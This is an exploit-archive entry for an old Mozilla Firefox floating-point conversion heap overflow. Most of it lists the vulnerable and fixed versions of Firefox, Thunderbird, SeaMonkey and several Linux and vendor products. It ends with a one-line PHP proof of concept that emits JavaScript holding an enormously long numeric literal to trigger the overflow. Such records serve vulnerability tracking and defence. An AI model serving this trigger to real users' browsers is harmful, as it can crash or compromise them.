Mozilla Firefox Floating Point Conversion Heap Overflow Vulnerability

2010-03-18T00:00:00
ID 1337DAY-ID-11360
Type zdt
Reporter n/a
Modified 2010-03-18T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            =====================================================================
Mozilla Firefox Floating Point Conversion Heap Overflow Vulnerability
=====================================================================

Vulnerable:  	 VMWare vMA 4.0
VMWare ESX Server 4.0
SuSE openSUSE 11.0
SuSE openSUSE 10.3
SuSE Linux 9
SuSE Linux 11
Sun OpenSolaris build snv_99
Sun OpenSolaris build snv_98
Sun OpenSolaris build snv_96
Sun OpenSolaris build snv_95
Sun OpenSolaris build snv_127
Sun OpenSolaris build snv_126
Sun OpenSolaris build snv_125
Sun OpenSolaris build snv_124
Sun OpenSolaris build snv_123
Sun OpenSolaris build snv_122
Sun OpenSolaris build snv_121
Sun OpenSolaris build snv_120
Sun OpenSolaris build snv_119
Sun OpenSolaris build snv_118
Sun OpenSolaris build snv_117
Sun OpenSolaris build snv_116
Sun OpenSolaris build snv_115
Sun OpenSolaris build snv_114
Sun OpenSolaris build snv_113
Sun OpenSolaris build snv_112
Sun OpenSolaris build snv_111a
Sun OpenSolaris build snv_111
Sun OpenSolaris build snv_110
Sun OpenSolaris build snv_109
Sun OpenSolaris build snv_108
Sun OpenSolaris build snv_107
Sun OpenSolaris build snv_106
Sun OpenSolaris build snv_105
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_103
Sun OpenSolaris build snv_102
Sun OpenSolaris build snv_101a
Sun OpenSolaris build snv_101
Sun OpenSolaris build snv_100
Slackware Linux 13.0 x86_64
Slackware Linux 13.0
Slackware Linux 12.2
Slackware Linux 12.0
Slackware Linux 11.0
Slackware Linux -current
S.u.S.E. SUSE Linux Enterprise Server 10 SP3
S.u.S.E. SUSE Linux Enterprise Server 10 SP2
S.u.S.E. SUSE Linux Enterprise Desktop 10 SP3
S.u.S.E. SUSE Linux Enterprise Desktop 10 SP2
S.u.S.E. SUSE Linux Enterprise 10 SP3 DEBUGINFO
S.u.S.E. SUSE Linux Enterprise 10 SP2 DEBUGINFO
S.u.S.E. SLES 11 DEBUGINFO
S.u.S.E. SLES 11
S.u.S.E. SLED 11
S.u.S.E. SLE SDK 10 SP3
S.u.S.E. SLE SDK 10 SP2
S.u.S.E. SLE 11
S.u.S.E. openSUSE 11.1
S.u.S.E. openSUSE 11.0
S.u.S.E. Linux 10.0
RedHat Fedora 11
RedHat Fedora 10
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux Optional Productivity Application 5.4.z server
RedHat Enterprise Linux Optional Productivity Application 5 server
RedHat Enterprise Linux ES 4.8.z
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux AS 4.8.z
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux Desktop version 4
RedHat Enterprise Linux 5 server
RedHat Desktop 4.0
RedHat Desktop 3.0
Pardus Linux 2009 0
Pardus Linux 2008 0
Mozilla Thunderbird 2.0 .9
Mozilla Thunderbird 2.0 .8
Mozilla Thunderbird 2.0 .6
Mozilla Thunderbird 2.0 .5
Mozilla Thunderbird 2.0 .4
Mozilla Thunderbird 2.0 .19
Mozilla Thunderbird 2.0 .17
Mozilla Thunderbird 2.0 .16
Mozilla Thunderbird 2.0 .15
Mozilla Thunderbird 2.0 .14
Mozilla Thunderbird 2.0 .13
Mozilla Thunderbird 2.0 .12
Mozilla Thunderbird 3.0
Mozilla Thunderbird 2.0.0.23
Mozilla Thunderbird 2.0.0.22
Mozilla Thunderbird 2.0.0.21
Mozilla Thunderbird 2.0.0.18
Mozilla Sunbird 0.9
Mozilla SeaMonkey 1.1.18
Mozilla SeaMonkey 1.1.17
Mozilla SeaMonkey 1.1.16
Mozilla SeaMonkey 1.1.15
Mozilla SeaMonkey 1.1.14
Mozilla SeaMonkey 1.1.13
Mozilla SeaMonkey 1.1.12
Mozilla SeaMonkey 1.1.11
Mozilla SeaMonkey 1.1.10
Mozilla SeaMonkey 1.1.9
Mozilla SeaMonkey 1.1.8
Mozilla SeaMonkey 1.1.7
Mozilla SeaMonkey 1.1.6
Mozilla SeaMonkey 1.1.5
Mozilla SeaMonkey 1.1.4
Mozilla SeaMonkey 1.1.3
Mozilla SeaMonkey 1.1.2
Mozilla SeaMonkey 1.1.1
Mozilla SeaMonkey 1.1 beta
Mozilla Firefox 3.5.3
Mozilla Firefox 3.5.2
Mozilla Firefox 3.5.1
Mozilla Firefox 3.5
Mozilla Firefox 3.0.14
Mozilla Firefox 3.0.13
Mozilla Firefox 3.0.12
Mozilla Firefox 3.0.11
Mozilla Firefox 3.0.10
Mozilla Firefox 3.0.9
Mozilla Firefox 3.0.8
Mozilla Firefox 3.0.7
Mozilla Firefox 3.0.6
Mozilla Firefox 3.0.5
Mozilla Firefox 3.0.4
Mozilla Firefox 3.0.3
Mozilla Firefox 3.0.2
Mozilla Firefox 3.0.1
Mozilla Firefox 3.0
Mozilla Camino 1.6.9
MandrakeSoft Linux Mandrake 2010.0 x86_64
MandrakeSoft Linux Mandrake 2010.0
MandrakeSoft Linux Mandrake 2009.1 x86_64
MandrakeSoft Linux Mandrake 2009.1
MandrakeSoft Linux Mandrake 2008.0 x86_64
MandrakeSoft Linux Mandrake 2008.0
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
K-Meleon K-Meleon 1.5.3
Flock Flock 2.5.2
Debian Linux 5.0 sparc
Debian Linux 5.0 s/390
Debian Linux 5.0 powerpc
Debian Linux 5.0 mipsel
Debian Linux 5.0 mips
Debian Linux 5.0 m68k
Debian Linux 5.0 ia-64
Debian Linux 5.0 ia-32
Debian Linux 5.0 hppa
Debian Linux 5.0 armel
Debian Linux 5.0 arm
Debian Linux 5.0 amd64
Debian Linux 5.0 alpha
Debian Linux 5.0
Avaya Voice Portal 4.1
Avaya Voice Portal 4.0
Avaya Messaging Storage Server 5.0
Avaya Messaging Storage Server 4.0
Avaya Message Networking MN 3.1
Avaya Message Networking 3.1
Avaya Message Networking
Avaya Intuity AUDIX LX 2.0 SP2
Avaya Intuity AUDIX LX 2.0 SP1
Avaya Intuity AUDIX LX 2.0
Not Vulnerable: 	VMWare ESX Server 4.0 ESX400-200912403
Sun OpenSolaris build snv_128
Mozilla Thunderbird 2.0 24
Mozilla SeaMonkey 1.1.19
Mozilla Firefox 3.5.4
Mozilla Firefox 3.0.15
Mozilla Camino 2.0
Flock Flock 2.5.5 

The following proof of concept PHP code is available:

<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script> 



#  0day.today [2018-02-05]  #